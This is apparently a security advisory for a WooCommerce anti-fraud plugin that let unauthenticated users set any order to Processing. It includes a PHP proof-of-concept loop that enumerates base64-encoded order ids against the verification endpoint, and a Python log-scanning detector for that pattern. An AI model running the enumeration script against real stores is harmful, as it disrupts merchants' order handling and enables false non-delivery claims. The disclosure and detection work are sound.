The plugin is affected by an issue where an unauthenticated user could change the status of any order to Processing, because no checks were performed when the order status was changed. The order_id was also predictable. At the individual level, a customer who has already received their order can set its status back to Processing, which may have unintended consequences, such as being able to claim that the order has not been shipped yet. At the site level, order IDs can be iterated from 1 upwards and every order on the site set to Processing, requiring remediation by the owner before business can continue.
<?php
// Proof of concept from the advisory: request the plugin's verification
// endpoint once per order id, with the id base64-encoded as in the PoC URL.
$site = "https://woocommerce-store-with-anti-fraud-installed.com";

for ( $order_id = 1; $order_id <= PHP_INT_MAX; $order_id++ ) {
    $order_64 = base64_encode( (string) $order_id );
    $url      = "{$site}/?order_id={$order_64}&paypal_verification=true";

    // A plain GET is sufficient; the response body is not needed.
    $handle = fopen( $url, 'r' );
    if ( $handle !== false ) {
        fclose( $handle );
    }
}
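As an added detection example (not part of the advisory or the plugin's code), the script below scans web-server access logs for the request pattern the PoC above produces: many distinct base64-encoded order_id values sent with paypal_verification=true from one client. It assumes combined-format access logs; the log lines embedded in it are constructed samples.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Nov/2020:10:00:01 +0000] "GET /?order_id=MQ%3D%3D&paypal_verification=true HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [22/Nov/2020:10:00:01 +0000] "GET /?order_id=Mg%3D%3D&paypal_verification=true HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [22/Nov/2020:10:00:02 +0000] "GET /?order_id=Mw%3D%3D&paypal_verification=true HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.7 - - [22/Nov/2020:10:00:02 +0000] "GET /?order_id=NA%3D%3D&paypal_verification=true HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.2 - - [22/Nov/2020:10:05:00 +0000] "GET /?order_id=MTA0Mg%3D%3D&paypal_verification=true HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Nov/2020:10:06:00 +0000] "GET /shop/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')


def decode_order_id(value: str):
    """Return the integer hidden in a base64 order_id value, or None if it is not one."""
    try:
        return int(base64.b64decode(value, validate=True).decode("ascii"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def extract_hits(log_text: str):
    """Yield (client_ip, order_id) for every request that hits the verification endpoint."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)  # parse_qs also URL-decodes %3D
        if query.get("paypal_verification") != ["true"] or "order_id" not in query:
            continue
        order_id = decode_order_id(query["order_id"][0])
        if order_id is not None:
            yield m.group("ip"), order_id


def find_enumerators(log_text: str, threshold: int = 3):
    """Map each client that touched `threshold` or more distinct orders to its sorted order ids."""
    seen = defaultdict(set)
    for ip, order_id in extract_hits(log_text):
        seen[ip].add(order_id)
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}


def is_sequential_run(order_ids) -> bool:
    """True when the ids form a contiguous ascending run, as the PoC's loop produces."""
    return list(order_ids) == list(range(order_ids[0], order_ids[0] + len(order_ids)))


if __name__ == "__main__":
    for ip, ids in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {len(ids)} orders, sequential={is_sequential_run(ids)}, ids={ids}")
```

Tune the threshold to the store's normal traffic; a legitimate customer returning from PayPal touches one order, so even a low threshold separates the two cases in the sample.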
Brian Henry
Brian Henry
Yes
2020-11-22 (about 2 years ago)
2020-11-23 (about 2 years ago)
2022-10-12 (about 3 months ago)